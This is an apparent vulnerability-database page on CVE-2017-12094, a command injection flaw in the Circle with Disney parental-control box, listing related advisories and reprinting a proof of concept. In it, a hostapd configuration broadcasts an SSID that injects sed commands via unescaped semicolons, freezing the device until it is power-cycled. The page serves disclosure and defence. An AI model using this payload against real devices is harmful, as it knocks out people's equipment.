| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| Circle with Disney Command Injection Vulnerability (CNVD-2017-33187) | 2 Nov 201700:00 | – | cnvd | |
| CVE-2017-12094 | 7 Nov 201716:00 | – | cve | |
| CVE-2017-12094 | 7 Nov 201716:00 | – | cvelist | |
| EUVD-2017-3680 | 7 Oct 202500:30 | – | euvd | |
| CVE-2017-12094 | 7 Nov 201716:29 | – | nvd | |
| Design/Logic Flaw | 7 Nov 201716:29 | – | prion | |
| Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability | 31 Oct 201700:00 | – | talos | |
| Vulnerability Spotlight: The Circle of a Bug’s Life | 31 Oct 201712:04 | – | talosblog |
The following proof of concept shows how to freeze the box on startup by broadcasting a specific SSID. The box will need manual power-cycling to boot again.
$ cat << 'EOF' > hostapd.conf
interface=wlan0
channel=1
ssid2=P"Channel: x /;:x/g;bx #Signal"
EOF
$ hostapd -B ./hostapd.conf
The SSID above is injected in the sed substitution command. Since semicolons are not escaped, they can be used to inject a new sed command.
In this example the injection creates an infinite loop by defining a "x/g" label and by jumping to it using "bx/g" (the ending "/g" is added by circle's script at [3]).
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation